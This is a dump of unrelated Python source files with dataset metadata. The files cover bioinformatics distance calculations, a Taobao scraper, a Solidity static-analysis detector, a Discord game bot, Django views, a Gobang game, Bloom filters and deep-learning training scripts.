kinase_distance_matrix.loc[kinase_name, kinase_name] = 0.0\n\n return kinase_distance_matrix\n\n def _get_kinase_distances(self, by=\"minimum\"):\n \"\"\"\n Extract per kinase pair one distance value from the set of structure pair distance values.\n\n Parameters\n ----------\n by : str\n Condition on which the distance value per kinase pair is extracted from the set of\n distances values per structure pair. Default: Minimum distance value.\n\n Returns\n -------\n pandas.DataFrame\n Fingerprint distance and coverage for kinase pairs.\n \"\"\"\n\n # Get distance values for structure pairs\n structure_distances = self._add_kinases_to_fingerprint_distance()\n\n # Group by kinase names\n structure_distances_grouped_by_kinases = structure_distances.groupby(\n by=[\"kinase_1\", \"kinase_2\"], sort=False\n )\n\n # Get distance values per kinase pair based on given condition\n by_terms = \"minimum maximum mean size\".split()\n\n if by == \"minimum\":\n kinase_distances = structure_distances_grouped_by_kinases.min()\n elif by == \"maximum\":\n kinase_distances = structure_distances_grouped_by_kinases.max()\n elif by == \"mean\":\n kinase_distances = structure_distances_grouped_by_kinases.mean()\n elif by == \"size\":\n kinase_distances = structure_distances_grouped_by_kinases.size()\n else:\n raise ValueError(f'Condition \"by\" unknown. Choose from: {\", \".join(by_terms)}')\n\n return kinase_distances\n\n def _add_kinases_to_fingerprint_distance(self):\n \"\"\"\n Add two columns to fingerprint distances for kinase 1 name and kinase 2 name.\n\n Returns\n -------\n pandas.DataFrame\n Fingerprint distance and coverage, plus details on both molecule codes and kinase names\n associated with fingerprint pairs.\n \"\"\"\n\n # Make a copy of distance values per structure pairs\n fingerprint_distance = self.data.copy()\n\n # Add columns for kinase names (kinase pair)\n fingerprint_distance[\"kinase_1\"] = [\n i.split(\"/\")[1].split(\"_\")[0] for i in fingerprint_distance.molecule_code_1\n ]\n fingerprint_distance[\"kinase_2\"] = [\n i.split(\"/\")[1].split(\"_\")[0] for i in fingerprint_distance.molecule_code_2\n ]\n\n return fingerprint_distance\n","sub_path":"kissim/comparison/fingerprint_distance_generator.py","file_name":"fingerprint_distance_generator.py","file_ext":"py","file_size_in_byte":13962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"610458197","text":"import requests\nfrom bs4 import BeautifulSoup\n\ndef open_url(keyword):\n payload = {'q':keyword,'sort':'sale-desc'}\n url = 'https://s.taobao.com/search'\n headers = {'user-agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36'}\n\n res = requests.get(url, params=payload, headers=headers)\n return res\n\ndef main():\n keyword = input('请输入关键词:')\n res = open_url(keyword)\n\n with open(\"items.txt\",'wt',encoding='utf-8') as f:\n f.write(res.text)\n\nif __name__ == '__main__':\n main()\n","sub_path":"淘宝/sales.py","file_name":"sales.py","file_ext":"py","file_size_in_byte":582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"226388409","text":"from fortress.detectors.abstract_detector import AbstractDetector, DetectorClassification\nfrom fortress.slithir.operations import Nop\n\n\nclass VoidConstructor(AbstractDetector):\n\n ARGUMENT = \"void-cst\"\n HELP = \"Constructor called not implemented\"\n IMPACT = DetectorClassification.LOW\n CONFIDENCE = DetectorClassification.HIGH\n\n WIKI = \"https://github.com/crytic/fortress/wiki/Detector-Documentation#void-constructor\"\n\n WIKI_TITLE = \"Void constructor\"\n WIKI_DESCRIPTION = \"Detect the call to a constructor that is not implemented\"\n WIKI_RECOMMENDATION = \"Remove the constructor call.\"\n WIKI_EXPLOIT_SCENARIO = \"\"\"\n```solidity\ncontract A{}\ncontract B is A{\n constructor() public A(){}\n}\n```\nWhen reading `B`'s constructor definition, we might assume that `A()` initiates the contract, but no code is executed.\"\"\"\n\n def _detect(self):\n \"\"\"\"\"\"\n results = []\n for c in self.contracts:\n cst = c.constructor\n if cst:\n\n for constructor_call in cst.explicit_base_constructor_calls_statements:\n for node in constructor_call.nodes:\n if any(isinstance(ir, Nop) for ir in node.irs):\n info = [\"Void constructor called in \", cst, \":\\n\"]\n info += [\"\\t- \", node, \"\\n\"]\n\n res = self.generate_result(info)\n\n results.append(res)\n return results\n","sub_path":"fortress/detectors/operations/void_constructor.py","file_name":"void_constructor.py","file_ext":"py","file_size_in_byte":1472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"14589071","text":"import discord\nfrom discord.ext import commands\nfrom discord.ext.commands import has_permissions\nimport time\nimport random\nfrom random import randint\n\nmembers_list = []\n\nclass Roulette(commands.Cog):\n\n def __init__(self, client):\n self.client = client\n\n @has_permissions(administrator=True)\n @commands.command()\n async def rr(self, ctx, add, member : discord.Member = None):\n\n self.add = \"add\"\n message_author = ctx.message.author.display_name\n\n if not member:\n await ctx.send(\"Tu dois renseigner un joueur !\")\n elif not member.display_name in members_list:\n\n members_list.append(member.display_name)\n print(members_list)\n await ctx.send(f'{member.display_name} a bien été ajouté à la liste de participants !')\n await ctx.send(f'Liste de joueurs : {members_list}, Taille de la liste : {len(members_list)}')\n\n @has_permissions(administrator=True)\n @commands.command()\n async def rrstart(self, ctx):\n\n if len(members_list) <= 1:\n await ctx.send(\"Il n'y a pas assez de participants !\")\n return\n\n timer = 5\n\n while timer != 0:\n\n await ctx.send(f'La roulette russe commence dans : {timer}')\n\n time.sleep(1)\n\n timer -= 1\n\n if timer == 0:\n while len(members_list) != 1:\n await ctx.send(\"Here we go! :ye:\")\n await ctx.send(\"Qui aura droit au chatiment divin ? :pensive:\")\n time.sleep(20)\n member_dead = members_list[randint(0, len(members_list)-1)]\n await ctx.send(f'Aïe | ||**{member_dead}**|| est mort.') \n members_list.remove(member_dead)\n await ctx.send(f'**Joueurs restants | {members_list}')\n time.sleep(15)\n\n if len(members_list) == 1:\n await ctx.send(f'Roulette Russe | **{members_list[0]}** a gagné la partie ! @here')\n\n\n\ndef setup(client):\n client.add_cog(Roulette(client))","sub_path":"cogs/roulette_russe.py","file_name":"roulette_russe.py","file_ext":"py","file_size_in_byte":2041,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"210464902","text":"from django.contrib import admin\nfrom .forms import CustomUserCreationForm\nfrom django.utils.html import format_html\nfrom hospital.models import Hospital\nfrom vehicle.models import Vehicle,VehicleCategory\nfrom django.urls import path\nfrom django.conf.urls import include, url\nfrom django.http import HttpResponse\nfrom django.template.response import TemplateResponse\nfrom django.utils.translation import gettext, gettext_lazy as _\nfrom django.utils.translation import ugettext_lazy\nfrom user.admin import admin_site\nfrom django.contrib.auth.decorators import login_required\nfrom django.utils.decorators import method_decorator\nfrom django.apps import apps\nclass HospitalAdmin(admin.ModelAdmin):\n list_display_links = None\n change_form_template = 'admin/hospital/change_form.html'\n change_list_template = 'admin/hospital/change_list.html'\n form = CustomUserCreationForm\n model = Hospital\n list_display = ('full_name','email', 'phone','address','status','Action')\n list_filter = ('status',)\n list_per_page = 5 #For Pagination\n\n fieldsets = (\n (None, {'fields': ('full_name','email','phone','address','status','password')}),\n )\n add_fieldsets = (\n (None, {\n 'classes': ('wide',),\n 'fields': ('full_name','email','phone','status','password', 'is_active')}\n ),\n )\n search_fields = ('email',)\n ordering = ('-id',)\n \n def Action(self, obj):\n if(obj.status == 3):\n delete = ''\n edit = ''\n add = ''\n else: \n delete = ' ' % (\n obj.id, obj.id)\n add = ' ' % (\n obj.id)\n edit = ' ' % (obj.id,obj.id)\n\n view = ' ' % (\n obj.id)\n \n return format_html(view + delete + edit + add)\n \n def get_urls(self):\n urls = super().get_urls()\n my_urls = [\n url('^view/(?P\\d+)/$', self.hospital_view),\n url('^add_vehicle/(?P\\d+)/$', self.vehicle_add),\n ]\n return my_urls + urls\n \n def extra_context(self, request):\n context = admin_site.each_context(request)\n context['opts'] = Hospital._meta\n context['site_title'] = ugettext_lazy('Hospital')\n return context\n\n\n @method_decorator(login_required())\n def vehicle_add(self, request,hospital_id):\n context = self.extra_context(request)\n context['title'] = 'Add Vehicle'\n context['data'] = Hospital.objects.get(id=hospital_id)\n context['category'] = VehicleCategory.objects.all()\n return TemplateResponse(request, 'admin/hospital/add_vehicle.html', context=context)\n\n @method_decorator(login_required())\n def hospital_view(self, request,hospital_id):\n context = self.extra_context(request)\n context['title'] = 'Hospital User Details'\n context['userDetail'] = Hospital.objects.get(id=hospital_id)\n context['Vehicle'] = Vehicle.objects.filter(user_id = hospital_id).filter(user_type = 1)\n context['site_title'] = ugettext_lazy('Hospital')\n return TemplateResponse(request, 'admin/hospital_view.html', context=context)\n\nadmin_site.register(Hospital,HospitalAdmin)\n","sub_path":"gelmeko/hospital/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":3741,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"177087716","text":"from django.core.exceptions import ObjectDoesNotExist\nfrom django.shortcuts import render\nfrom django.http import HttpResponse\n\nfrom ProyectoPruebaDjango.apps.categories.forms import CategoryForm\nfrom ProyectoPruebaDjango.apps.categories.models import Category, CategoryModelForm\n\n# Create your views here.\n\n#ejemplo de uso de save() - Para crear o actualizar categoria\ndef create(request):\n\n #create a model Category instance\n category = Category(name='Categoria 1', description='Categoria creada desde modelo')\n #invoke the save() method to create/save the record\n #NO record id reference, so a create operation is made and the reference is updated with id\n category.save()\n\n #change field on instance\n category.name = 'Categoria 2'\n\n print(\"Se creo la categoria con id = \" + str(category.id))\n\n #invoke the save() method ti update/save record\n #record has id reference from prior save() call, so operation is update.\n #category.save()\n category.save(update_fields=['name']) #actualiza solo el campo 'name'. Por defecto Django actualiza todos los campos\n\n print(\"Se actualizo la categoria con id = \" + str(category.id))\n\n return HttpResponse('Categoria creada con exito') #imprime directamente en pagina\n\n#ejemplo de uso de get() para recuperar UN SOLO registro de categoria\ndef search(request, category_id):\n\n try:\n category = Category.objects.get(id=category_id)\n #category = Category.objects.get(name__contains='PHP') #error si get() recupera mas de un registro\n # category, createdOK = Category.objects.get_or_create(name=\"PHP\") #si no recupera, crea un registro\n #usa get y save combinados\n return HttpResponse(\"Se cargo de la base de datos la categoria: %s\" % category.name)\n except ObjectDoesNotExist:\n return HttpResponse(\"No se encontro la categoria con id = %s\" % category_id)\n\n #prueba con input(). La pagina queda cargando hasta recibir el input\n # try:\n # id_input = input(\"Ingrese el id de la categoria a buscar: \")\n # category = Category.objects.get(id=int(id_input))\n # return HttpResponse(\"Se cargo de la base de datos la categoria: %s\" % category.name)\n # except:\n # return HttpResponse(\"No se encontro la categoria con id = %s\" % id_input)\n\n#ejempl de uso de update()\ndef update(request, category_id):\n cant = Category.objects.filter(id=category_id).update(name='Programacion general') #si no se filtrara por primay key\n # (o campo unique), se podrian recuperar varios registros y update() los actualizaria a TODOS\n # filter() retorna un query set (se ve uso en la siguiente view (funcion index))\n return HttpResponse(\"Se actualizo el nombre de: %d categoria/s\" % cant)\n\n# ejemplo de uso de all(), filter() y in_builk() - para listar todas las categirias\ndef index(request):\n categories = Category.objects.all()\n #categories = Category.objects.filter(name='PHP') #recupero categorias con filtro (SELECT ... WHERE name = \"PHP\")\n #categories = Category.objects.in_bulk() #retorna un diccionario con los registros, no un queryset\n #print(categories.query) #permite ver la consulta SQL\n #Artificio: obtiene una lista de categorias (diccionarios) a partir del queryset de all() o filter()\n # Esto se hace para imprimir con el HttpResponse()\n data = [{'id': category.id, 'name': category.name} for category in categories]\n return HttpResponse(str(data))\n\n# views para trabajar con formularios \n\n# create\ndef create_form(request):\n # crear categoria con model form (la clase del form se guarda en models.py junto al modelo)\n if request.method == 'POST':\n # POST, generate form with data from request\n form = CategoryModelForm(request.POST) #se instancia el form con los datos enviados por el\n # usuario por si se debe reenviar al mismo con los datos por no ser validado\n # check if it's valid\n if form.is_valid():\n # Insert into DB\n form.save()\n # redirect to a new URL\n return HttpResponse('Categoria almacenada correctamente en la BD')\n else:\n # GET, generate unbound (blank) form\n form = CategoryModelForm()\n return render(request, 'categories/create.html', {'form':form})\n\n# crear categoria con form standalone (independiente). La clase del form usada se guada en forms.py\n\"\"\" if request.method == \"POST\":\n # POST, generate form with data from request\n form = CategoryForm(request.POST)\n if form.is_valid:\n # process data, insert into DB, generate email, etc\n\n # redirect to a new URL\n return HttpResponse(\"Categoria agregada correctamente\")\n\n else:\n # GET, generate blank form\n form = CategoryForm(initial={'description':'Descripcion opcional'}) \n return render(request, 'categories/create.html', {'form':form}) \"\"\"","sub_path":"ProyectoPruebaDjango/apps/categories/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4966,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"387739547","text":"# coding:utf-8\n\nimport pygame\nfrom pygame.locals import *\nfrom sys import exit\nfrom consts import *\nfrom gobang import GoBang\nfrom render import GameRender\n\n# from gobang_ai import GobangAI\n\nif __name__ == '__main__':\n gobang = GoBang()\n render = GameRender(gobang)\n # 先给AI留个接口\n # ai = GobangAI(gobang, ChessboardState.WHITE)\n result = ChessboardState.EMPTY\n enable_ai = False\n\n while True:\n # 捕捉pygame事件\n for event in pygame.event.get():\n # 退出程序\n if event.type == QUIT:\n exit()\n elif event.type == MOUSEBUTTONDOWN:\n # 成功着棋\n if render.one_step():\n result = gobang.get_chess_result()\n else:\n continue\n if result != ChessboardState.EMPTY:\n break\n if enable_ai:\n # ai.one_step()\n result = gobang.get_chess_result()\n else:\n render.change_state()\n\n # 绘制\n render.draw_chess()\n render.draw_mouse()\n\n if result != ChessboardState.EMPTY:\n render.draw_result(result)\n\n # 刷新\n pygame.display.update()","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1272,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"287825094","text":"\"\"\"\ninput: [1, 2, 3, 4, 5], k = 2\n\noutput: [3, 4, 5, 1, 2]\n\n\n\ninput: [0, 1, 2, 3, 4], k = 1\n\noutput: [1, 2, 3, 4, 0]\n\"\"\"\n\ndef solution(li:list, k:int):\n for i in range(k):\n first = li[0]\n li = li[1:]\n li.append(first)\n return li\n\ndef solution2(li:list, k:int):\n for i in range(k):\n first = li[0]\n length = len(li)\n for index in range(0,li-1):\n li[index] = li[index+1]\n li[-1] = first\n return li\n \ndef solution3(li:list, k:int):\n k = k % len(li)\n first = li[0:k]\n second = li[k:]\n li = second + first\n return li\n\n ","sub_path":"algorithim/src/list_rotation_by_k.py","file_name":"list_rotation_by_k.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"119280306","text":"import sys\nimport pickle\nimport math\nimport random\n\nfrom BloomFilter import BestBloomFilter, BloomFilter\nfrom utils import *\n\nsys.path.append(\"../lib\")\n\n\nclass PLBF(object):\n \"\"\"\n Practical learned bloom filter use gbdt as classifier\n \"\"\"\n def __init__(self, model, data, using_Fpr=True, fp_rate=0.01, total_size=100000, model_size=int(70 * 1024 * 8),\n is_train=True):\n self.model = model\n self.threshold = 0.9\n self.using_Fpr = using_Fpr\n self.is_train = is_train\n (s1, s2) = split_negatives(data, 0.7)\n if self.is_train:\n self.fit(data.positives, data.negatives)\n else:\n self.model.load_model()\n if using_Fpr:\n self.fp_rate = float(fp_rate)\n self.create_best_bloom_filter(data, s2)\n else:\n self.m = total_size - model_size\n self.create_bloom_filter(data, s2)\n\n def check(self, item):\n if self.model.predict(item) > self.threshold:\n return True\n return self.bloom_filter.check(item)\n\n def create_best_bloom_filter(self, data, test_negatives):\n print(\"Creating bloom filter\")\n self.get_threshold(test_negatives, data)\n print(\"model threshold: %f\" % self.threshold)\n\n false_negatives = []\n preds = self.model.predicts(data.positives)\n for i in range(len(data.positives)):\n if preds[i] <= self.threshold:\n false_negatives.append(data.positives[i])\n print(\"Number of false negatives at bloom time\", len(false_negatives))\n self.bloom_filter = BestBloomFilter(len(false_negatives), self.fp_rate / 2)\n for fn in false_negatives:\n self.bloom_filter.add(fn)\n print(\"Created bloom filter\")\n print(\"hash function K: \", self.bloom_filter.hash_count)\n print(\"bBF memory size: \", self.bloom_filter.size)\n\n def fit(self, positives, negatives):\n shuffled = shuffle_for_training(negatives, positives)\n self.model.fit(shuffled[0], shuffled[1])\n print(\"Done fitting\")\n\n # add data to test\n def get_threshold(self, test_negatives, data):\n fp_index = math.ceil((len(test_negatives) * (1 - self.fp_rate / 2)))\n predictions = self.model.predicts(test_negatives)\n predictions.sort()\n\n \"\"\"\n import pandas as pd\n excel_data = pd.DataFrame(predictions)\n writer = pd.ExcelWriter('preds.xlsx') # 写入Excel文件\n excel_data.to_excel(writer, float_format='%.5f')\n writer.save()\n writer.close()\n \n # ---------------------------------------------\n predictions = self.model.predicts(test_negatives[0:10])\n print('test negatives:', predictions)\n result1 = list()\n result2 = list()\n for i in range(10):\n result1.append(self.model.predict(test_negatives[i]))\n for i in range(10):\n result2.append(self.model.predict(data.positives[i]))\n print('negative keys test: ', result1)\n print('positive keys test: ', result2)\n exit()\n # \"\"\"\n self.threshold = predictions[fp_index]\n\n","sub_path":"Code/PLBF-GBDT/PLBF.py","file_name":"PLBF.py","file_ext":"py","file_size_in_byte":3161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"507130587","text":"import json\n\n# some JSON:\nx = '{\"Name\":\"Rana\", \"Age\":23, \"City\":\"Riyadh\"}'\ny = json.loads(x)\n# the result is a Python dictionary:\nprint(y[\"Age\"])\n\n\nx = {\"Name\": \"Rana\", \"Age\": 23, \"City\": \"Riyadh\"}\n# convert into json\ny = json.dumps(x)\n# the result is a json string\nprint(y)\n\n\nx = {\n \"name\": \"Rana\",\n \"age\": 23,\n \"married\": False,\n \"divorced\": False,\n \"children\": None,\n \"pets\": True,\n \"cars\": [\n {\"model\": \"BMW 230\", \"mpg\": 27.5},\n {\"model\": \"Ford Edge\", \"mpg\": 24.1}\n ]\n}\ny = json.dumps(x)\nprint(y)\n","sub_path":"Day55.py","file_name":"Day55.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"640037168","text":"import tensorflow as tf\nimport utils.shapenet_provider as sp\nimport utils.matplot_viewer as mpv\nimport cfgs.pointnet_config as pn_cfg\nimport models.pointnet_cls as model\nimport os\nimport numpy as np\n\n# Download shapenet data\nsp.download_data()\n# Get pointnet config\ncfg = pn_cfg.get_pointnet_config()\n\n\ndef show_pc():\n for idx in range(len(cfg.train_files)):\n temp_data = sp.load_h5(cfg.train_files[idx])\n temp_labels = temp_data[1]\n # print(temp_labels)\n for j in range(3, len(temp_data[0])):\n mpv.show_pointcloud_fromarray(temp_data[0][j], cfg.label_names[temp_labels[j][0]])\n\n\ndef train():\n with tf.Graph().as_default():\n with tf.device('/gpu:' + str(cfg.gpu_idx)):\n pc_pl, labels_pl = model.get_inputs_pl(cfg.batch_size, cfg.point_num)\n is_training_pl = tf.placeholder(tf.bool, shape=())\n print(is_training_pl)\n batch = tf.Variable(0)\n bn_decay = get_bn_decay(batch)\n pred, end_points = model.get_model(pc_pl, is_training_pl, bn_decay=bn_decay)\n loss = model.get_loss(pred, labels_pl, end_points)\n correct = tf.equal(tf.argmax(pred, 1), tf.to_int64(labels_pl))\n accuracy = tf.reduce_sum(tf.cast(correct, tf.float32)) / float(cfg.batch_size)\n learning_rate = get_learning_rate(batch)\n optimizer = tf.train.AdamOptimizer(learning_rate)\n train_op = optimizer.minimize(loss, global_step=batch)\n saver = tf.train.Saver()\n # Create a session\n config = tf.ConfigProto()\n config.gpu_options.allow_growth = True\n config.allow_soft_placement = True\n config.log_device_placement = False\n sess = tf.Session(config=config)\n init = tf.global_variables_initializer()\n sess.run(init, {is_training_pl: True})\n ops = {'pc_pl': pc_pl,\n 'labels_pl': labels_pl,\n 'is_training_pl': is_training_pl,\n 'pred': pred,\n 'loss': loss,\n 'train_op': train_op,\n 'step': batch}\n for epoch in range(cfg.max_epoch):\n print('**** EPOCH %03d ****' % epoch)\n\n train_one_epoch(sess, ops)\n\n # Save the variables to disk.\n if epoch % 50 == 0:\n save_path = saver.save(sess, os.path.join(cfg.model_dir, \"model%03d.ckpt\" % epoch))\n print(\"Model saved in file: %s\" % save_path)\n\n\ndef get_learning_rate(batch):\n learning_rate = tf.train.exponential_decay(\n cfg.base_lr, # Base learning rate.\n batch * cfg.batch_size, # Current index into the dataset.\n cfg.decay_step, # Decay step.\n cfg.decay_rate, # Decay rate.\n staircase=True)\n learning_rate = tf.maximum(learning_rate, 0.00001) # CLIP THE LEARNING RATE!\n return learning_rate\n\n\ndef get_bn_decay(batch):\n bn_momentum = tf.train.exponential_decay(\n 0.5,\n batch*cfg.batch_size,\n float(cfg.decay_step),\n 0.5,\n staircase=True)\n bn_decay = tf.minimum(0.99, 1 - bn_momentum)\n return bn_decay\n\n\ndef train_one_epoch(sess, ops):\n \"\"\" ops: dict mapping from string to tf ops \"\"\"\n is_training = True\n\n # Shuffle train files\n train_file_idxs = np.arange(0, len(cfg.train_files))\n np.random.shuffle(train_file_idxs)\n\n for fn in range(len(cfg.train_files)):\n print('----' + str(fn) + '-----')\n current_data, current_label = sp.loadDataFile(cfg.train_files[train_file_idxs[fn]])\n current_data = current_data[:, 0:cfg.point_num, :]\n current_data, current_label, _ = sp.shuffle_data(current_data, np.squeeze(current_label))\n current_label = np.squeeze(current_label)\n\n file_size = current_data.shape[0]\n num_batches = file_size // cfg.batch_size\n\n total_correct = 0\n total_seen = 0\n loss_sum = 0\n\n for batch_idx in range(num_batches):\n start_idx = batch_idx * cfg.batch_size\n end_idx = (batch_idx + 1) * cfg.batch_size\n\n # Augment batched point clouds by rotation and jittering\n rotated_data = sp.rotate_point_cloud(current_data[start_idx:end_idx, :, :])\n jittered_data = sp.jitter_point_cloud(rotated_data)\n feed_dict = {ops['pc_pl']: jittered_data,\n ops['labels_pl']: current_label[start_idx:end_idx],\n ops['is_training_pl']: is_training, }\n step, _, loss_val, pred_val = sess.run([ops['step'],\n ops['train_op'],\n ops['loss'],\n ops['pred']],\n feed_dict=feed_dict)\n pred_val = np.argmax(pred_val, 1)\n correct = np.sum(pred_val == current_label[start_idx:end_idx])\n total_correct += correct\n total_seen += cfg.batch_size\n loss_sum += loss_val\n\n print('mean loss: %f' % (loss_sum / float(num_batches)))\n print('accuracy: %f' % (total_correct / float(total_seen)))\n\n\ntrain()\n","sub_path":"scripts/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":5340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"492866183","text":"import os\nimport utils\nimport argparse\nimport numpy as np\n\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.optim import lr_scheduler\nfrom torch.utils.data import DataLoader\n# dataset\nfrom data import SignalDataset\n\n# call model\nfrom model import Baseline\nimport train\n# base config\n\n\ndef config():\n parser = argparse.ArgumentParser()\n\n parser.add_argument('--data_dir', type=str,\n default='./data', help='signal data dir')\n parser.add_argument('--num_epoch', type=int, default=10, help='epoch')\n parser.add_argument('--lr', type=int, default=1e-3, help='learning rate')\n parser.add_argument('--batch_size', type=int,\n default=16, help='data batch size')\n parser.add_argument('--model', type=str,\n default='Baseline', help='train model')\n parser.add_argument('--save_dir', type=str,\n default='./results', help='output data dir')\n parser.add_argument('--save_name', type=str,\n default='', help='manual name')\n parser.add_argument('--ngpu', type=int, default=1,\n help='Multi gpu training ')\n parser.add_argument('--device', type=None, default=torch.device('cuda:1'),\n help='cuda device index')\n parser.add_argument('--mode', type=str, choices=['3000', '1000'], help='data numbers')\n parser.add_argument('--num_worker', type=int, default=4, help='num workers')\n\n args = parser.parse_args()\n return args\n\n\ndef split_weight(net):\n \"\"\"\n split weights into categories\n one : conv, linear layer => decay\n others : bn weights, bias \n \"\"\"\n\n decay = []\n no_decay = []\n\n for m in net.modules():\n if isinstance(m, nn.Conv1d) or isinstance(m, nn.Linear):\n decay.append(m.weight)\n\n if m.bias is not None:\n no_decay.append(m.bias)\n else:\n # class에 인자가 있는지 확인\n if hasattr(m, 'weight'):\n no_decay.append(m.weight)\n if hasattr(m, 'bias'):\n no_decay.append(m.bias)\n\n assert len(list(net.parameters())) == len(decay) + len(no_decay)\n # net.parameters() 형태로 반환\n return [dict(params=decay), dict(params=no_decay, weight_decay=0)]\n\n\ndef main():\n args = config()\n # args, inner variable\n device = args.device\n batch_size = args.batch_size\n num_workers = args.num_worker\n torch.backends.cudnn.benchmark = True\n\n # data loader - already SignalDataset to cuda\n # dataset : dictionary train, dev, test\n datasets = {}\n dataloaders = {}\n\n for k in ['train', 'eval', 'test']:\n datasets[k] = SignalDataset(k, args.data_dir)\n dataloaders[k] = DataLoader(\n datasets[k], args.batch_size, shuffle=True, num_workers=4)\n if k == 'test':\n dataloaders[k] = DataLoader(\n datasets[k], args.batch_size, shuffle=False, num_workers=4)\n\n # model load\n\n if args.ngpu > 1:\n print(f\"Model Build....{args.model}\")\n model = args.model().to(device)\n torch.nn.DataParallel(model)\n else:\n print(f\"Model Build....{args.model}\")\n model = Baseline().to(device)\n\n\n # criterion\n\n criterion = nn.BCEWithLogitsLoss()\n # criterion = nn.MSELoss()\n\n # optimizer\n # adam default => le =1e-3 , betas : 0.9, 0.999 eps=1e-8, weight decay=0\n params = split_weight(model)\n #optimizer = optim.Adam(params)\n optimizer = optim.Adamax(params, lr=args.lr)\n # scheduler\n scheduler = lr_scheduler.StepLR(optimizer, step_size=10, gamma=0.1)\n\n # Train\n best_model = train.train(dataloaders, model, criterion, optimizer, scheduler, args)\n\n # Test\n #test_loss, test_pred = test(dataloaders, model, criterion, optimizer, scheduler, args)\n\n if not os.path.exists(args.save_dir):\n os.mkdir(args.save_dir)\n\n # save\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"Datathon/BIOSIG/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"459202508","text":"import logging\nimport time\n\nimport pytest\n\nfrom common.utils import resize_browser\n\nlogger = logging.getLogger(__name__)\n\n@pytest.fixture(scope='function')\ndef browser(module_browser, base_url, request):\n resize_browser(browser=module_browser, resolution=request.param)\n time.sleep(0.5)\n module_browser.get(base_url)\n if module_browser.is_desktop():\n module_browser.click(xpath=\"//a[@id='best-expense-video-id']\")\n else:\n module_browser.click(xpath=\"//div[contains(@class, 'sticky-cta-mobile')]/a\")\n time.sleep(1)\n return module_browser\n\ndef submit_getdemo_form(browser, email=None, firstname=None, lastname=None, phone=None, company_size=None, agree=None):\n if email:\n browser.input(xpath=\"//input[@name='email']\", keys=email)\n if firstname:\n browser.input(xpath=\"//input[@name='firstname']\", keys=firstname)\n if lastname:\n browser.input(xpath=\"//input[@name='lastname']\", keys=lastname)\n if phone:\n browser.input(xpath=\"//input[@name='phone']\", keys=phone)\n if company_size:\n browser.click(xpath=\"//input[@id='number_of_employees']\")\n browser.click(xpath=f\"//li[@data-value='{company_size}']\")\n if agree:\n browser.click(xpath='//div[contains(@class, \"custom-checkbox\")]')\n browser.click(xpath='//button[text()=\"Get a demo\"]')\n\n@pytest.mark.parametrize('browser', [('desktop_1'), ('mobile_1')], indirect=True)\ndef test_bad_email(browser):\n submit_getdemo_form(browser, email='foo')\n e = browser.find(xpath=\"//label[@for='demo-email'][@class='error']\")\n assert e and e.is_displayed(), 'No error displayed for invalid email'\n\n@pytest.mark.parametrize('browser', [('desktop_1'), ('mobile_1')], indirect=True)\ndef test_missing_firstname(browser):\n submit_getdemo_form(browser, email='megatron@fyle.in')\n e = browser.find(xpath=\"//label[@for='demo-first-name'][@class='error demo-first-name-error']\")\n assert e and e.is_displayed(), 'No error displayed for missing firstname'\n\n@pytest.mark.parametrize('browser', [('desktop_1'), ('mobile_1')], indirect=True)\ndef test_success(browser):\n submit_getdemo_form(browser, email='megatron@fyle.in', firstname='Megatron', lastname='Transformer', phone='123456789', company_size='Under 5', agree=True)\n time.sleep(2)\n e = browser.find(xpath=\"//h3[contains(text(), 'Thank')]\")\n assert e and e.is_displayed(), 'Not displaying thank you message'\n","sub_path":"homepage/test_getdemo.py","file_name":"test_getdemo.py","file_ext":"py","file_size_in_byte":2415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"407542214","text":"\nfrom . import it_planning_app\nfrom .get_incoming import *\nfrom .it_planning import create_graph\nfrom .node_add import add_node\nfrom .node_edit import edit_node\nfrom .node_remove import remove_node\nfrom flask import render_template, session, jsonify, redirect, url_for, request\nfrom login.decorators import is_logged_in, it_allowed\n\n\n@it_planning_app.route('/itPlanning', methods=[\"POST\", \"GET\"])\n@is_logged_in\n@it_allowed\ndef it_planning():\n \"\"\"\n Для пользоватеей с it_role = 1 и 2 будут строиться полные графы\n :return:\n \"\"\"\n ack = create_graph()\n return ack\n\n\n@it_planning_app.route('/itPlanningBubles', methods=[\"GET\"])\n@is_logged_in\n@it_allowed\ndef itPlanningBubles():\n role = request.args.get('role', default=0, type=int)\n scenario = request.args.get('scenario', default=0, type=int)\n if role == session['it_role'] and scenario:\n return render_template('it_planning/itPlanningBubles.html')\n return redirect(url_for('it_planning_app.itPlanningMenu'))\n\n\n@it_planning_app.route('/itPlanningMenu', methods=['POST', 'GET'])\n@is_logged_in\n@it_allowed\ndef itPlanningMenu():\n if request.method == 'POST':\n print(dict(session))\n return jsonify(access=dict(session))\n return render_template('it_planning/itPlanningMenu.html')\n\n\n@it_planning_app.route('/itPlanningChange', methods=[\"POST\", \"GET\"])\n@is_logged_in\ndef redacting_node():\n incoming_data = 